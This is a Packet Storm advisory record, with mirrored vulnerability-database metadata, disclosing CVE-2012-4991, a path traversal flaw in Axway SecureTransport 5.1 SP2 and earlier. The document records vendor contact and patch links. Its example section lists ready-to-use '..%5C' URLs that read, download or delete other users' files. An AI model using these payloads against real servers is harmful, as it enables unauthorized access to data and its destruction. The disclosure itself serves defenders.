ID PACKETSTORM:118766 Type packetstorm Reporter Sebastian Perez Modified 2012-12-11T00:00:00
Description
`Secure Transport Path Traversal Vulnerability
Public Disclosure Date:
November 11, 2012
Vendors Affected:
Axway
http://www.axway.com
Systems Affected:
Secure Transport
Problem:
A path traversal vulnerability was identified in SecureTransport versions 5.1 SP2 and earlier on the Microsoft Windows platform that could allow tampering and information disclosure. This vulnerability allows remote attackers to access other user's directories, and also to read, download, delete and upload arbitrary files. This can be performed using a encoded backslash characters (%5c) in the path.
Example:
To escape the lock home directory, use the following url
https://<<IP>>/..%5C
To get access to another user's home directory, use the following url
https://<<IP>>/..%5C<<Username>>
To read another user's file in his/her home directory, use the following url
https://<<IP>>/..%5C<<Username>>/file.txt?P
To download another user's file in his/her home directory, use the following url
https://<<IP>>/..%5C<<Username>>/file.txt?B
To delete another user's file in his/her home directory, use the following url
https://<<IP>>/..%5C<<Username>>/file.txt?D
To upload a file in other user's home directory just use the upload function
Vendor Status: Contacted on September 12, 2012
Informed: Contacted back on September 12, 2012
Contacted: Customer confirmed the vulnerability, and that this was solved on October 30, 2012
Patch Available:
For 4.9.2 sp2:
https://support.axway.com/en/downloads/download-details/id/35283
For 5.1 sp2:
https://support.axway.com/en/downloads/download-details/id/35957
CVE: CVE-2012-4991
CVSSv2 Score: 8.5
CVSSv2 Access Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:N)
Impact Type: Allows unauthorized disclosure and modification of information
Status: Fixed
Acknowledgment: Axway would like to acknowledge Sebastian Perez (@Seba_DTT), of Deloitte Argentina (www.deloitte.com/ar) and Deloitte Canada (www.deloitte.ca) for helping to identify this issue.
Related Links:
Deloitte Argentina
www.deloitte.com/ar
Vendor Product:
http://www.axway.com/products-solutions/mft/gateways/securetransport
Axway Support
For further information, or assistance with this Patch, contact Axway Global Support.
Online - https://support.axway.com
Email - support@axway.com
Sebastian Perez, C|EH
Senior Consultant | Information Security Specialist
Security, Privacy & Resilience Services - Enterprise Risk Services
Deloitte & Co. S.A.
Pte. Gral.J.D.Perón 646, 7piso- C1038AAN Buenos Aires Argentina
Main: +54 11 4320 2700 ext. 8350 | Fax: +54 11 4320 4071
seperez@deloitte.com | www.deloitte.com
Por favor tome en cuenta el medio ambiente antes de imprimir
Deloitte se refiere a una o más de las firmas miembros de Deloitte Touche Tohmatsu Limited, una compañía privada del Reino Unido limitada por garantía, y su red de firmas miembros, cada una como una entidad única e independiente y legalmente separada. Una descripción detallada de la estructura legal de Deloitte Touche Tohmatsu Limited y sus firmas miembros puede verse en el sitio web http://www.deloitte.com/about. La información de este mail es confidencial y concierne únicamente a la persona a quien está dirigida. Si este mensaje no está dirigido a usted, por favor tenga presente que no tiene autorización para leer el resto de este e-mail, copiarlo o derivarlo a cualquier otra persona que no sea aquella a quien está dirigido. Si recibe este mail por error, por favor, avise al remitente, luego de lo cual rogamos a usted destruya el mensaje original. No se puede responsabilizar de ningún modo a Deloitte & Co. S.A. ni a sus subsidiarias por cualquier consecuencia o daño que pueda resultar del apropiado y completo envío y recepción del contenido de este e-mail.
Deloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee, and its network of member firms, each of which is a legally separate and independent entity. Please see http://www.deloitte.com/about for a detailed description of the legal structure of Deloitte Touche Tohmatsu Limited and its member firms.
The information in this e-mail is confidential and intended solely for the person to whom it is addressed. If this message is not addressed to you, please be aware that you have no authorization to read the rest of this e-mail, to copy it or to furnish it to any person other than the addressee. Should you have received this e-mail by mistake, please bring this to the attention of the sender, after which you are kindly requested to destroy the original message. Deloitte & Co. S.A. and subsidiaries cannot be held responsible or liable in any way whatsoever for and/or in connection with any consequences and/or damage resulting from the proper and complete dispatch and receipt of the content of this e-mail.
`
{"id": "PACKETSTORM:118766", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Axway Directory Traversal", "description": "", "published": "2012-12-11T00:00:00", "modified": "2012-12-11T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:NONE/", "score": 8.5}, "href": "https://packetstormsecurity.com/files/118766/Axway-Directory-Traversal.html", "reporter": "Sebastian Perez", "references": [], "cvelist": ["CVE-2012-4991"], "lastseen": "2016-12-05T22:12:52", "viewCount": 6, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2016-12-05T22:12:52", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-4991"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28880", "SECURITYVULNS:VULN:12791"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:FBB6D8B5CE0B0678B5901A751FF8215F"]}, {"type": "exploitdb", "idList": ["EDB-ID:23324"]}], "modified": "2016-12-05T22:12:52", "rev": 2}, "vulnersScore": 6.3}, "sourceHref": "https://packetstormsecurity.com/files/download/118766/axway-traversal.txt", "sourceData": "`Secure Transport Path Traversal Vulnerability \n \nPublic Disclosure Date: \nNovember 11, 2012 \n \nVendors Affected: \nAxway \nhttp://www.axway.com \n \nSystems Affected: \nSecure Transport \n \nProblem: \nA path traversal vulnerability was identified in SecureTransport versions 5.1 SP2 and earlier on the Microsoft Windows platform that could allow tampering and information disclosure. This vulnerability allows remote attackers to access other user's directories, and also to read, download, delete and upload arbitrary files. This can be performed using a encoded backslash characters (%5c) in the path. \n \nExample: \nTo escape the lock home directory, use the following url \nhttps://<<IP>>/..%5C \nTo get access to another user's home directory, use the following url \nhttps://<<IP>>/..%5C<<Username>> \nTo read another user's file in his/her home directory, use the following url \nhttps://<<IP>>/..%5C<<Username>>/file.txt?P \nTo download another user's file in his/her home directory, use the following url \nhttps://<<IP>>/..%5C<<Username>>/file.txt?B \nTo delete another user's file in his/her home directory, use the following url \nhttps://<<IP>>/..%5C<<Username>>/file.txt?D \nTo upload a file in other user's home directory just use the upload function \n \nVendor Status: Contacted on September 12, 2012 \n \nInformed: Contacted back on September 12, 2012 \n \nContacted: Customer confirmed the vulnerability, and that this was solved on October 30, 2012 \n \nPatch Available: \nFor 4.9.2 sp2: \nhttps://support.axway.com/en/downloads/download-details/id/35283 \nFor 5.1 sp2: \nhttps://support.axway.com/en/downloads/download-details/id/35957 \n \nCVE: CVE-2012-4991 \n \nCVSSv2 Score: 8.5 \n \nCVSSv2 Access Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:N) \n \nImpact Type: Allows unauthorized disclosure and modification of information \n \nStatus: Fixed \n \nAcknowledgment: Axway would like to acknowledge Sebastian Perez (@Seba_DTT), of Deloitte Argentina (www.deloitte.com/ar) and Deloitte Canada (www.deloitte.ca) for helping to identify this issue. \n \nRelated Links: \nDeloitte Argentina \nwww.deloitte.com/ar \n \nVendor Product: \nhttp://www.axway.com/products-solutions/mft/gateways/securetransport \n \nAxway Support \nFor further information, or assistance with this Patch, contact Axway Global Support. \nOnline - https://support.axway.com \nEmail - support@axway.com \n \n \n \nSebastian Perez, C|EH \nSenior Consultant | Information Security Specialist \nSecurity, Privacy & Resilience Services - Enterprise Risk Services \nDeloitte & Co. S.A. \nPte. Gral.J.D.Per\u00f3n 646, 7piso- C1038AAN Buenos Aires Argentina \nMain: +54 11 4320 2700 ext. 8350 | Fax: +54 11 4320 4071 \nseperez@deloitte.com | www.deloitte.com \nPor favor tome en cuenta el medio ambiente antes de imprimir \n \n \n \nDeloitte se refiere a una o m\u00e1s de las firmas miembros de Deloitte Touche Tohmatsu Limited, una compa\u00f1\u00eda privada del Reino Unido limitada por garant\u00eda, y su red de firmas miembros, cada una como una entidad \u00fanica e independiente y legalmente separada. Una descripci\u00f3n detallada de la estructura legal de Deloitte Touche Tohmatsu Limited y sus firmas miembros puede verse en el sitio web http://www.deloitte.com/about. La informaci\u00f3n de este mail es confidencial y concierne \u00fanicamente a la persona a quien est\u00e1 dirigida. Si este mensaje no est\u00e1 dirigido a usted, por favor tenga presente que no tiene autorizaci\u00f3n para leer el resto de este e-mail, copiarlo o derivarlo a cualquier otra persona que no sea aquella a quien est\u00e1 dirigido. Si recibe este mail por error, por favor, avise al remitente, luego de lo cual rogamos a usted destruya el mensaje original. No se puede responsabilizar de ning\u00fan modo a Deloitte & Co. S.A. ni a sus subsidiarias por cualquier consecuencia o da\u00f1o que pueda resultar del apropiado y completo env\u00edo y recepci\u00f3n del contenido de este e-mail. \n \nDeloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee, and its network of member firms, each of which is a legally separate and independent entity. Please see http://www.deloitte.com/about for a detailed description of the legal structure of Deloitte Touche Tohmatsu Limited and its member firms. \nThe information in this e-mail is confidential and intended solely for the person to whom it is addressed. If this message is not addressed to you, please be aware that you have no authorization to read the rest of this e-mail, to copy it or to furnish it to any person other than the addressee. Should you have received this e-mail by mistake, please bring this to the attention of the sender, after which you are kindly requested to destroy the original message. Deloitte & Co. S.A. and subsidiaries cannot be held responsible or liable in any way whatsoever for and/or in connection with any consequences and/or damage resulting from the proper and complete dispatch and receipt of the content of this e-mail. \n`\n"}
{"cve": [{"lastseen": "2020-12-09T19:47:24", "description": "Multiple directory traversal vulnerabilities in Axway SecureTransport 5.1 SP2 and earlier allow remote authenticated users to (1) read, (2) delete, or (3) create files, or (4) list directories, via a ..%5C (encoded dot dot backslash) in a URI.", "edition": 5, "cvss3": {}, "published": "2012-12-13T11:53:00", "title": "CVE-2012-4991", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4991"], "modified": "2012-12-13T11:53:00", "cpe": ["cpe:/a:axway:securetransport:5.1"], "id": "CVE-2012-4991", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4991", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:N"}, "cpe23": ["cpe:2.3:a:axway:securetransport:5.1:sp2:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T20:45:27", "description": "Axway Secure Transport 5.1 SP2 Path Traversal Vulnerability. CVE-2012-4991. Webapps exploit for windows platform", "published": "2012-12-12T00:00:00", "type": "exploitdb", "title": "Axway Secure Transport 5.1 SP2 Path Traversal Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-4991"], "modified": "2012-12-12T00:00:00", "id": "EDB-ID:23324", "href": "https://www.exploit-db.com/exploits/23324/", "sourceData": "Secure Transport Path Traversal Vulnerability\r\n\r\nPublic Disclosure Date:\r\nNovember 11, 2012\r\n\r\nVendors Affected:\r\nAxway\r\nhttp://www.axway.com\r\n\r\nSystems Affected:\r\nSecure Transport\r\n\r\nProblem:\r\nA path traversal vulnerability was identified in SecureTransport versions 5.1 SP2 and earlier on the Microsoft Windows platform that could allow tampering and information disclosure. This vulnerability allows remote attackers to access other user's directories, and also to read, download, delete and upload arbitrary files. This can be performed using a encoded backslash characters (%5c) in the path.\r\n \r\nExample:\r\nTo escape the lock home directory, use the following url\r\nhttps://<<IP>>/..%5C\r\nTo get access to another user's home directory, use the following url\r\nhttps://<<IP>>/..%5C<<Username>>\r\nTo read another user's file in his/her home directory, use the following url\r\nhttps://<<IP>>/..%5C<<Username>>/file.txt?P\r\nTo download another user's file in his/her home directory, use the following url\r\nhttps://<<IP>>/..%5C<<Username>>/file.txt?B\r\nTo delete another user's file in his/her home directory, use the following url\r\nhttps://<<IP>>/..%5C<<Username>>/file.txt?D\r\nTo upload a file in other user's home directory just use the upload function\r\n\r\nVendor Status: Contacted on September 12, 2012\r\n\r\nInformed: Contacted back on September 12, 2012\r\n\r\nContacted: Customer confirmed the vulnerability, and that this was solved on October 30, 2012\r\n\r\nPatch Available:\r\nFor 4.9.2 sp2:\r\nhttps://support.axway.com/en/downloads/download-details/id/35283\r\nFor 5.1 sp2:\r\nhttps://support.axway.com/en/downloads/download-details/id/35957\r\n\r\nCVE: CVE-2012-4991\r\n\r\nCVSSv2 Score: 8.5\r\n\r\nCVSSv2 Access Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:N)\r\n\r\nImpact Type: Allows unauthorized disclosure and modification of information\r\n\r\nStatus: Fixed\r\n\r\nAcknowledgment: Axway would like to acknowledge Sebastian Perez (@Seba_DTT), of Deloitte Argentina (www.deloitte.com/ar) and Deloitte Canada (www.deloitte.ca) for helping to identify this issue.\r\n\r\nRelated Links:\r\nDeloitte Argentina\r\nwww.deloitte.com/ar\r\n\r\nVendor Product:\r\nhttp://www.axway.com/products-solutions/mft/gateways/securetransport\r\n\r\nAxway Support\r\nFor further information, or assistance with this Patch, contact Axway Global Support.\r\nOnline - https://support.axway.com\r\nEmail - support@axway.com\r\n\r\n\r\n\r\nSebastian Perez, C|EH\r\nSenior Consultant | Information Security Specialist\r\nSecurity, Privacy & Resilience Services - Enterprise Risk Services\r\nDeloitte & Co. S.A.\r\nPte. Gral.J.D.Per\u00f3n 646, 7piso- C1038AAN Buenos Aires Argentina\r\nMain: +54 11 4320 2700 ext. 8350 | Fax: +54 11 4320 4071\r\nseperez@deloitte.com | www.deloitte.com\r\nPor favor tome en cuenta el medio ambiente antes de imprimir\r\n\r\n\r\n \r\nDeloitte se refiere a una o m\u00e1s de las firmas miembros de Deloitte Touche Tohmatsu Limited, una compa\u00f1\u00eda privada del Reino Unido limitada por garant\u00eda, y su red de firmas miembros, cada una como una entidad \u00fanica e independiente y legalmente separada. Una descripci\u00f3n detallada de la estructura legal de Deloitte Touche Tohmatsu Limited y sus firmas miembros puede verse en el sitio web http://www.deloitte.com/about. La informaci\u00f3n de este mail es confidencial y concierne \u00fanicamente a la persona a quien est\u00e1 dirigida. Si este mensaje no est\u00e1 dirigido a usted, por favor tenga presente que no tiene autorizaci\u00f3n para leer el resto de este e-mail, copiarlo o derivarlo a cualquier otra persona que no sea aquella a quien est\u00e1 dirigido. Si recibe este mail por error, por favor, avise al remitente, luego de lo cual rogamos a usted destruya el mensaje original. No se puede responsabilizar de ning\u00fan modo a Deloitte & Co. S.A. ni a sus subsidiarias por cualquier consecuencia o da\u00f1o que pueda resultar del apropiado y completo env\u00edo y recepci\u00f3n del contenido de este e-mail.\r\n \r\nDeloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee, and its network of member firms, each of which is a legally separate and independent entity. Please see http://www.deloitte.com/about for a detailed description of the legal structure of Deloitte Touche Tohmatsu Limited and its member firms. \r\nThe information in this e-mail is confidential and intended solely for the person to whom it is addressed. If this message is not addressed to you, please be aware that you have no authorization to read the rest of this e-mail, to copy it or to furnish it to any person other than the addressee. Should you have received this e-mail by mistake, please bring this to the attention of the sender, after which you are kindly requested to destroy the original message. Deloitte & Co. S.A. and subsidiaries cannot be held responsible or liable in any way whatsoever for and/or in connection with any consequences and/or damage resulting from the proper and complete dispatch and receipt of the content of this e-mail", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/23324/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:05", "description": "\nAxway Secure Transport 5.1 SP2 - Directory Traversal", "edition": 1, "published": "2012-12-12T00:00:00", "title": "Axway Secure Transport 5.1 SP2 - Directory Traversal", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-4991"], "modified": "2012-12-12T00:00:00", "id": "EXPLOITPACK:FBB6D8B5CE0B0678B5901A751FF8215F", "href": "", "sourceData": "Secure Transport Path Traversal Vulnerability\n\nPublic Disclosure Date:\nNovember 11, 2012\n\nVendors Affected:\nAxway\nhttp://www.axway.com\n\nSystems Affected:\nSecure Transport\n\nProblem:\nA path traversal vulnerability was identified in SecureTransport versions 5.1 SP2 and earlier on the Microsoft Windows platform that could allow tampering and information disclosure. This vulnerability allows remote attackers to access other user's directories, and also to read, download, delete and upload arbitrary files. This can be performed using a encoded backslash characters (%5c) in the path.\n \nExample:\nTo escape the lock home directory, use the following url\nhttps://<<IP>>/..%5C\nTo get access to another user's home directory, use the following url\nhttps://<<IP>>/..%5C<<Username>>\nTo read another user's file in his/her home directory, use the following url\nhttps://<<IP>>/..%5C<<Username>>/file.txt?P\nTo download another user's file in his/her home directory, use the following url\nhttps://<<IP>>/..%5C<<Username>>/file.txt?B\nTo delete another user's file in his/her home directory, use the following url\nhttps://<<IP>>/..%5C<<Username>>/file.txt?D\nTo upload a file in other user's home directory just use the upload function\n\nVendor Status: Contacted on September 12, 2012\n\nInformed: Contacted back on September 12, 2012\n\nContacted: Customer confirmed the vulnerability, and that this was solved on October 30, 2012\n\nPatch Available:\nFor 4.9.2 sp2:\nhttps://support.axway.com/en/downloads/download-details/id/35283\nFor 5.1 sp2:\nhttps://support.axway.com/en/downloads/download-details/id/35957\n\nCVE: CVE-2012-4991\n\nCVSSv2 Score: 8.5\n\nCVSSv2 Access Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:N)\n\nImpact Type: Allows unauthorized disclosure and modification of information\n\nStatus: Fixed\n\nAcknowledgment: Axway would like to acknowledge Sebastian Perez (@Seba_DTT), of Deloitte Argentina (www.deloitte.com/ar) and Deloitte Canada (www.deloitte.ca) for helping to identify this issue.\n\nRelated Links:\nDeloitte Argentina\nwww.deloitte.com/ar\n\nVendor Product:\nhttp://www.axway.com/products-solutions/mft/gateways/securetransport\n\nAxway Support\nFor further information, or assistance with this Patch, contact Axway Global Support.\nOnline - https://support.axway.com\nEmail - support@axway.com\n\n\n\nSebastian Perez, C|EH\nSenior Consultant | Information Security Specialist\nSecurity, Privacy & Resilience Services - Enterprise Risk Services\nDeloitte & Co. S.A.\nPte. Gral.J.D.Per\u00f3n 646, 7piso- C1038AAN Buenos Aires Argentina\nMain: +54 11 4320 2700 ext. 8350 | Fax: +54 11 4320 4071\nseperez@deloitte.com | www.deloitte.com\nPor favor tome en cuenta el medio ambiente antes de imprimir\n\n\n \nDeloitte se refiere a una o m\u00e1s de las firmas miembros de Deloitte Touche Tohmatsu Limited, una compa\u00f1\u00eda privada del Reino Unido limitada por garant\u00eda, y su red de firmas miembros, cada una como una entidad \u00fanica e independiente y legalmente separada. Una descripci\u00f3n detallada de la estructura legal de Deloitte Touche Tohmatsu Limited y sus firmas miembros puede verse en el sitio web http://www.deloitte.com/about. La informaci\u00f3n de este mail es confidencial y concierne \u00fanicamente a la persona a quien est\u00e1 dirigida. Si este mensaje no est\u00e1 dirigido a usted, por favor tenga presente que no tiene autorizaci\u00f3n para leer el resto de este e-mail, copiarlo o derivarlo a cualquier otra persona que no sea aquella a quien est\u00e1 dirigido. Si recibe este mail por error, por favor, avise al remitente, luego de lo cual rogamos a usted destruya el mensaje original. No se puede responsabilizar de ning\u00fan modo a Deloitte & Co. S.A. ni a sus subsidiarias por cualquier consecuencia o da\u00f1o que pueda resultar del apropiado y completo env\u00edo y recepci\u00f3n del contenido de este e-mail.\n \nDeloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee, and its network of member firms, each of which is a legally separate and independent entity. Please see http://www.deloitte.com/about for a detailed description of the legal structure of Deloitte Touche Tohmatsu Limited and its member firms. \nThe information in this e-mail is confidential and intended solely for the person to whom it is addressed. If this message is not addressed to you, please be aware that you have no authorization to read the rest of this e-mail, to copy it or to furnish it to any person other than the addressee. Should you have received this e-mail by mistake, please bring this to the attention of the sender, after which you are kindly requested to destroy the original message. Deloitte & Co. S.A. and subsidiaries cannot be held responsible or liable in any way whatsoever for and/or in connection with any consequences and/or damage resulting from the proper and complete dispatch and receipt of the content of this e-mail", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-4991"], "description": "\r\n\r\nSecure Transport Path Traversal Vulnerability\r\n\r\nPublic Disclosure Date:\r\nNovember 11, 2012\r\n\r\nVendors Affected:\r\nAxway\r\nhttp://www.axway.com\r\n\r\nSystems Affected:\r\nSecure Transport\r\n\r\nProblem:\r\nA path traversal vulnerability was identified in SecureTransport versions 5.1 SP2 and earlier on the Microsoft Windows platform that could allow tampering and information disclosure. This vulnerability allows remote attackers to access other user's directories, and also to read, download, delete and upload arbitrary files. This can be performed using a encoded backslash characters (%5c) in the path. \r\n \r\nExample:\r\nTo escape the lock home directory, use the following url\r\nhttps://<<IP>>/..%5C\r\nTo get access to another user's home directory, use the following url\r\nhttps://<<IP>>/..%5C<<Username>>\r\nTo read another user's file in his/her home directory, use the following url\r\nhttps://<<IP>>/..%5C<<Username>>/file.txt?P\r\nTo download another user's file in his/her home directory, use the following url\r\nhttps://<<IP>>/..%5C<<Username>>/file.txt?B\r\nTo delete another user's file in his/her home directory, use the following url\r\nhttps://<<IP>>/..%5C<<Username>>/file.txt?D\r\nTo upload a file in other user's home directory just use the upload function\r\n\r\nVendor Status: Contacted on September 12, 2012\r\n\r\nInformed: Contacted back on September 12, 2012\r\n\r\nContacted: Customer confirmed the vulnerability, and that this was solved on October 30, 2012\r\n\r\nPatch Available: \r\nFor 4.9.2 sp2:\r\nhttps://support.axway.com/en/downloads/download-details/id/35283\r\nFor 5.1 sp2:\r\nhttps://support.axway.com/en/downloads/download-details/id/35957\r\n\r\nCVE: CVE-2012-4991\r\n\r\nCVSSv2 Score: 8.5\r\n\r\nCVSSv2 Access Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:N)\r\n\r\nImpact Type: Allows unauthorized disclosure and modification of information\r\n\r\nStatus: Fixed\r\n\r\nAcknowledgment: Axway would like to acknowledge Sebastian Perez (@Seba_DTT), of Deloitte Argentina (www.deloitte.com/ar) and Deloitte Canada (www.deloitte.ca) for helping to identify this issue.\r\n\r\nRelated Links:\r\nDeloitte Argentina\r\nwww.deloitte.com/ar\r\n\r\nVendor Product:\r\nhttp://www.axway.com/products-solutions/mft/gateways/securetransport\r\n\r\nAxway Support\r\nFor further information, or assistance with this Patch, contact Axway Global Support.\r\nOnline - https://support.axway.com\r\nEmail - support@axway.com\r\n\r\n\r\n\r\nSebastian Perez, C|EH\r\nSenior Consultant | Information Security Specialist\r\nSecurity, Privacy & Resilience Services - Enterprise Risk Services\r\nDeloitte & Co. S.A.\r\nPte. Gral.J.D.Peron 646, 7piso- C1038AAN Buenos Aires Argentina\r\nMain: +54 11 4320 2700 ext. 8350 | Fax: +54 11 4320 4071\r\nseperez@deloitte.com | www.deloitte.com\r\nPor favor tome en cuenta el medio ambiente antes de imprimir\r\n\r\n\r\n \r\nDeloitte se refiere a una o mas de las firmas miembros de Deloitte Touche Tohmatsu Limited, una compania privada del Reino Unido limitada por garantia, y su red de firmas miembros, cada una como una entidad unica e independiente y legalmente separada. Una descripcion detallada de la estructura legal de Deloitte Touche Tohmatsu Limited y sus firmas miembros puede verse en el sitio web http://www.deloitte.com/about. La informacion de este mail es confidencial y concierne unicamente a la persona a quien esta dirigida. Si este mensaje no esta dirigido a usted, por favor tenga presente que no tiene autorizacion para leer el resto de este e-mail, copiarlo o derivarlo a cualquier otra persona que no sea aquella a quien esta dirigido. Si recibe este mail por error, por favor, avise al remitente, luego de lo cual rogamos a usted destruya el mensaje original. No se puede responsabilizar de ningun modo a Deloitte & Co. S.A. ni a sus subsidiarias por cualquier consecuencia o dano que pueda resultar del apropiado y completo envio y recepcion del contenido de este e-mail.\r\n \r\nDeloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee, and its network of member firms, each of which is a legally separate and independent entity. Please see http://www.deloitte.com/about for a detailed description of the legal structure of Deloitte Touche Tohmatsu Limited and its member firms. \r\nThe information in this e-mail is confidential and intended solely for the person to whom it is addressed. If this message is not addressed to you, please be aware that you have no authorization to read the rest of this e-mail, to copy it or to furnish it to any person other than the addressee. Should you have received this e-mail by mistake, please bring this to the attention of the sender, after which you are kindly requested to destroy the original message. Deloitte & Co. S.A. and subsidiaries cannot be held responsible or liable in any way whatsoever for and/or in connection with any consequences and/or damage resulting from the proper and complete dispatch and receipt of the content of this e-mail.\r\n", "edition": 1, "modified": "2012-12-18T00:00:00", "published": "2012-12-18T00:00:00", "id": "SECURITYVULNS:DOC:28880", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28880", "title": "Path Traversal Vulnerability on Secure Transport versions 5.1 SP2 and earlier", "type": "securityvulns", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:49", "bulletinFamily": "software", "cvelist": ["CVE-2012-4991", "CVE-2012-6330", "CVE-2012-6329", "CVE-2012-5469"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2012-12-18T00:00:00", "published": "2012-12-18T00:00:00", "id": "SECURITYVULNS:VULN:12791", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12791", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:NONE/"}}]}